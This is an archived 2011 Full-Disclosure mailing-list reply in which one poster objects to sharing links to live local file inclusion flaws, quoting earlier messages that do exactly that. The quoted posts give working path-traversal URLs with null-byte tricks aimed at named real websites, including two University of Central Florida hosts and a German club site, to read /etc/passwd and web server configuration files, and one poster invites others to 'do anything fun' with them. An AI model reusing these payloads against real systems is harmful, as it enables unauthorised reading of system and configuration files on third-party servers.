lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Sat, 19 Feb 2011 19:06:03 -0800
From: ghost <ghosts@...il.com>
To: Friedrich Hausberger <fhausberger@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: LFI Bug and other

It sure as hell was not meant to be a place where children post links
to sites with live LFI issues.



On Sat, Feb 19, 2011 at 4:58 AM, Friedrich Hausberger
<fhausberger@...il.com> wrote:
> Is full disclosure a security mailing list, where I can find hacking
> stuff or a magazine about
> chat show? I hate pornography also, but this is the wrong way to publish.
>
> Here you have a LFI vuln I found by accident:
>
> http://bc-heppenheim.de/download.php?datei=../../../../../etc/passwd.
> Feel free to download the whole Debian 4.0 Distribution.
>
> Most provider do not use jails/chroot or similar for their multi hosted
> webserver. Nearly all providers are hackable under 3 days.
>
> Regards
>
> FHausberger
>
>>
>> Message: 17
>> Date: Sat, 19 Feb 2011 01:08:56 -0500
>> From: Hack Talk<hacktalkblog@...il.com>
>> Subject: [Full-disclosure] University of Central Florida Multiple LFI
>> To: full-disclosure@...ts.grok.org.uk
>> Message-ID:
>>       <AANLkTi=oyDpNL6Jgu8Ms=btLaZdjUkvyhFxXLH8vDjj0@...l.gmail.com>
>> Content-Type: text/plain; charset="iso-8859-1"
>>
>> Found these and thought I'd share:
>>
>> -==================-
>> http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00
>> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
>> -==================-
>> Let me know if you do anything fun with 'em
>>
>> Luis Santana - Security+
>> Administrator - http://hacktalk.net
>> HackTalk Security - Security From The Underground
>> -------------- next part --------------
>> An HTML attachment was scrubbed...
>> URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110219/6916c766/attachment-0001.html
>>
>> ------------------------------
>>
>> Message: 18
>> Date: Sat, 19 Feb 2011 16:34:21 +0530
>> From: Madhur Ahuja<ahuja.madhur@...il.com>
>> Subject: Re: [Full-disclosure] University of Central Florida Multiple
>>       LFI
>> To: Hack Talk<hacktalkblog@...il.com>
>> Cc: full-disclosure@...ts.grok.org.uk
>> Message-ID:
>>       <AANLkTimd5F1Kgw1uCO_UGgX3mVUiMuU9jaisp6K=SM-K@...l.gmail.com>
>> Content-Type: text/plain; charset="utf-8"
>>
>> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00
>>
>> On Sat, Feb 19, 2011 at 11:38 AM, Hack Talk<hacktalkblog@...il.com>  wrote:
>>
>>> Found these and thought I'd share:
>>>
>>> -==================-
>>>
>>> http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00
>>>
>>> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
>>> -==================-
>>> Let me know if you do anything fun with 'em
>>>
>>> Luis Santana - Security+
>>> Administrator - http://hacktalk.net
>>> HackTalk Security - Security From The Underground
>>>
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>> -------------- next part --------------
>> An HTML attachment was scrubbed...
>> URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110219/d0ac46de/attachment.html
>>
>> ------------------------------
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>> End of Full-Disclosure Digest, Vol 72, Issue 44
>> ***********************************************
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ